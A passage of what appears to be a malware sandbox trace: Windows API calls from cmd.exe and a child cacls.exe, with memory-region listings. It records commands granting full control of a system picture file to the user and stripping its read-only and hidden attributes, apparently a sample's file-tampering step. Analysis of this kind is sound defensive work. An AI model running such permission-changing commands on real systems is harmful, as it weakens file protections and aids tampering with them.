[0181.979] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f644 | out: lpFindFileData=0x30f644) returned 0x400ae8 [0181.979] FindClose (in: 
hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0181.979] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.979] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0181.979] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0181.979] GetEnvironmentStringsW () returned 0x400308* [0181.979] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.980] GetConsoleOutputCP () returned 0x1b5 [0181.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.980] GetUserDefaultLCID () returned 0x409 [0181.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa08, cchData=128 | out: lpLCData="0") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa08, cchData=128 | out: lpLCData="0") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa08, cchData=128 | out: lpLCData="1") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0181.981] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0181.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0181.981] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0181.982] GetConsoleTitleW (in: lpConsoleTitle=0x3f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.982] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0181.982] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0181.983] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0181.983] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0181.983] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0181.983] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0181.983] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0181.983] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0181.983] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0181.983] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0181.986] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0181.986] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0181.986] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0181.986] 
_wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0181.986] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0181.986] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0181.986] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0181.988] GetConsoleTitleW (in: lpConsoleTitle=0x30f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.988] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.988] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.988] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.988] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.988] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.988] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.988] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.988] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.988] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.988] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.989] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.989] _wcsicmp 
(_String1="CACLS", _String2="CALL") returned -9 [0181.989] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.989] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.989] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.989] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.989] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.989] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.989] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.989] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.989] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.989] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.989] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.989] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.989] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.989] 
_wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.989] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.989] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.989] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.989] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.990] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.990] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.990] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.990] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.990] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.990] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.990] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.990] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.990] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.990] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.990] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.990] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.990] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.990] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 
[0181.990] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.990] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.990] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.990] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0181.990] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0181.990] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0181.990] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0181.991] SetErrorMode (uMode=0x0) returned 0x0 [0181.991] SetErrorMode (uMode=0x1) returned 0x0 [0181.991] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x401e98, lpFilePart=0x30f1bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f1bc*="Desktop") returned 0x18 [0181.991] SetErrorMode (uMode=0x0) returned 0x1 [0181.991] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.991] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.996] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.996] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x402180 [0181.997] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0181.997] GetLastError () returned 0x2 [0181.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x402180 [0181.997] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0181.997] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.997] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.997] GetConsoleTitleW (in: lpConsoleTitle=0x30f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.998] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f380 | out: lpAttributeList=0x30f2b8, lpSize=0x30f380) returned 1 [0181.998] UpdateProcThreadAttribute (in: lpAttributeList=0x30f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f2b8, lpPreviousValue=0x0) returned 1 [0181.998] GetStartupInfoW (in: lpStartupInfo=0x30f274 | out: lpStartupInfo=0x30f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.998] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.999] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f360 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f360*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc2c, dwThreadId=0xd1c)) returned 1 [0182.001] CloseHandle (hObject=0x4c) returned 1 [0182.001] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.001] GetEnvironmentStringsW () returned 0x400308* [0182.001] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.001] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.037] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f254 | out: lpExitCode=0x30f254*=0x0) returned 1 [0182.037] CloseHandle (hObject=0x50) returned 1 [0182.037] _vsnwprintf (in: _Buffer=0x30f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f260 | out: _Buffer="00000000") returned 8 [0182.037] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.037] GetEnvironmentStringsW () returned 0x402410* [0182.037] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.037] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.037] 
GetEnvironmentStringsW () returned 0x402410* [0182.037] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.037] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f2b8 | out: lpAttributeList=0x30f2b8) [0182.037] GetConsoleTitleW (in: lpConsoleTitle=0x30f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.038] GetLastError () returned 0x2 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.038] GetLastError () returned 0x2 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x3fe4d8 [0182.038] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0182.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.039] GetLastError () returned 0x2 [0182.039] FindFirstFileExW 
(in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x3fe4d8 [0182.039] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0182.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.039] GetConsoleTitleW (in: lpConsoleTitle=0x30f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f380 | out: lpAttributeList=0x30f2b8, lpSize=0x30f380) returned 1 [0182.039] UpdateProcThreadAttribute (in: lpAttributeList=0x30f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f2b8, lpPreviousValue=0x0) returned 1 [0182.039] GetStartupInfoW (in: lpStartupInfo=0x30f274 | out: lpStartupInfo=0x30f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.039] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.039] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile15.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f360 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessInformation=0x30f360*(hProcess=0x4c, hThread=0x50, dwProcessId=0xca0, dwThreadId=0xcb4)) returned 1 [0182.041] CloseHandle (hObject=0x50) returned 1 [0182.041] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.041] GetEnvironmentStringsW () returned 0x402410* [0182.041] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.041] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.203] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f254 | out: lpExitCode=0x30f254*=0x0) returned 1 [0182.203] CloseHandle (hObject=0x4c) returned 1 [0182.203] _vsnwprintf (in: _Buffer=0x30f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f260 | out: _Buffer="00000000") returned 8 [0182.203] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.203] GetEnvironmentStringsW () returned 0x402410* [0182.203] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.203] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.203] GetEnvironmentStringsW () returned 0x402410* [0182.204] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.204] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f2b8 | out: lpAttributeList=0x30f2b8) [0182.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.204] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.204] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.204] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0182.204] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.204] SetConsoleInputExeNameW () returned 0x1 [0182.204] GetConsoleOutputCP () returned 0x1b5 [0182.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.204] exit (_Code=0) Process: id = "344" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "343" os_parent_pid = "0xbf4" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25613 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25614 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25615 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25616 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25617 start_va = 0x4a0000 end_va = 0x4a8fff entry_point = 0x4a0000 region_type = mapped_file name = "cacls.exe" 
filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25618 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25619 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25620 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25621 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25622 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25623 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25624 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25625 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25626 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25627 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 25628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
